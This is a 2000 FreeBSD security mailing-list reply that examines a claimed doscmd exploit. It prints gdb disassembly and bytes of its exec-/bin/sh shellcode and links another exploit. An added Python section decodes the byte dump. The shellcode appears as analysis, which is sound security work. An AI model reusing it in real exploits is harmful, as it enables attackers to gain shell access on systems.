Date:      Wed, 16 Feb 2000 09:41:39 -0700 (MST)
From:      Paul Hart <hart@iserver.com>
To:        Brett Glass <brett@lariat.org>
Cc:        freebsd-security@FreeBSD.ORG
Subject:   Re: Doscmd
Message-ID:  <Pine.BSF.4.21.0002160923340.66839-100000@anchovy.orem.iserver.com>
In-Reply-To: <4.2.2.20000215235704.043169d0@localhost>

On Tue, 15 Feb 2000, Brett Glass wrote:

> If it relies on doscmd being suid, then it would fail. But
> I have wondered whether control of your descriptor tables would
> let you hack the system.  What's in that machine language?

Nothing interesting.  Just the standard exec-a-shell code:

(gdb) x/19i 0x80487d7
0x80487d7 <_fini+7>:    jmp    0x80487fc <_fini+44>
0x80487d9 <_fini+9>:    popl   %esi
0x80487da <_fini+10>:   leal   (%esi),%ebx
0x80487dc <_fini+12>:   movl   %ebx,0xb(%esi)
0x80487df <_fini+15>:   xorl   %edx,%edx
0x80487e1 <_fini+17>:   movl   %edx,0x7(%esi)
0x80487e4 <_fini+20>:   movl   %edx,0xf(%esi)
0x80487e7 <_fini+23>:   movl   %edx,0x14(%esi)
0x80487ea <_fini+26>:   movb   %dl,0x19(%esi)
0x80487ed <_fini+29>:   xorl   %eax,%eax
0x80487ef <_fini+31>:   movb   $0x3b,%al
0x80487f1 <_fini+33>:   leal   0xb(%esi),%ecx
0x80487f4 <_fini+36>:   movl   %ecx,%edx
0x80487f6 <_fini+38>:   pushl  %edx
0x80487f7 <_fini+39>:   pushl  %ecx
0x80487f8 <_fini+40>:   pushl  %ebx
0x80487f9 <_fini+41>:   pushl  %eax
0x80487fa <_fini+42>:   jmp    0x8048814 <_fini+68>
0x80487fc <_fini+44>:   call   0x80487d9 <_fini+9>
(gdb) x/1i 0x8048814
0x8048814 <_fini+68>:   lcall  0x407,0x4040404
(gdb) x/19xb 0x8048801
0x8048801 <_fini+49>:   0x2f    0x62    0x69    0x6e    0x2f    0x73    0x68    0x01
0x8048809 <_fini+57>:   0x01    0x01    0x01    0x02    0x02    0x02    0x02    0x03
0x8048811 <_fini+65>:   0x03    0x03    0x03
(gdb) 

For what it's worth, there is another so-called "exploit" for FreeBSD on
Packetstorm Security:

    http://packetstorm.securify.com/0002-exploits/umount.c

I don't know about you, but my /sbin/umount isn't SUID either.  ;-)

Paul Hart

--
Paul Robert Hart        ><8>  ><8>  ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8>  ><8>  ><8>        http://www.iserver.com/
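To make the byte dump above easier to read, here is an added example (not from Paul's mail or from FreeBSD): a small parser for gdb `x/xb` output that reassembles the 19 bytes, pulls out the embedded string, and lists the filler runs after it together with the `movl` instruction from the disassembly that overwrites each one before the syscall. The dump text is embedded as constructed input, and the offset-to-instruction map is transcribed from the disassembly in the mail.

```python
import re
from itertools import groupby

# Constructed input: the three "x/19xb" lines copied from the mail above.
GDB_DUMP = """\
0x8048801 <_fini+49>:   0x2f    0x62    0x69    0x6e    0x2f    0x73    0x68    0x01
0x8048809 <_fini+57>:   0x01    0x01    0x01    0x02    0x02    0x02    0x02    0x03
0x8048811 <_fini+65>:   0x03    0x03    0x03
"""
# Offsets from %esi (the popped string address) that the disassembly above
# overwrites before the syscall; transcribed from its movl instructions.
PATCHES = {
    0x7: "movl %edx,0x7(%esi): zeroed -> NUL terminator for the string",
    0xb: "movl %ebx,0xb(%esi): address of the string -> argv[0]",
    0xf: "movl %edx,0xf(%esi): zeroed -> argv[1] = NULL",
}
LINE_RE = re.compile(r"^\s*(0x[0-9a-fA-F]+)\s*(?:<[^>]*>)?:\s*(.*)$")

def parse_gdb_xb(dump: str):
    """Reassemble gdb 'x/Nxb' output into (base_address, bytes)."""
    base, out = None, bytearray()
    for m in filter(None, map(LINE_RE.match, dump.splitlines())):
        addr = int(m.group(1), 16)
        if base is None:
            base = addr
        elif addr != base + len(out):           # lines must be contiguous
            raise ValueError(f"dump is not contiguous at {addr:#x}")
        out.extend(int(tok, 16) for tok in m.group(2).split())
    if base is None:
        raise ValueError("no gdb dump lines found")
    return base, bytes(out)

def filler_runs(blob: bytes, start: int):
    """Runs of identical bytes from `start` on, as (offset, length, value)."""
    runs, off = [], start
    for value, grp in groupby(blob[start:]):
        n = len(list(grp))
        runs.append((off, n, value))
        off += n
    return runs

def triage(blob: bytes):
    """Name the embedded string and explain the filler runs that follow it."""
    idx = blob.find(b"/bin/sh")
    if idx < 0:
        return {"string": None, "placeholders": [], "explained": []}
    runs = filler_runs(blob, idx + 7)
    return {"string": blob[idx:idx + 7].decode("ascii"), "placeholders": runs,
            "explained": [PATCHES.get(o, "not written by the shown code") for o, _, _ in runs]}
```

Running `triage` on the parsed dump shows why the filler bytes are 0x01/0x02/0x03 rather than zeros: each run sits exactly where one of the `movl` instructions later writes the real value.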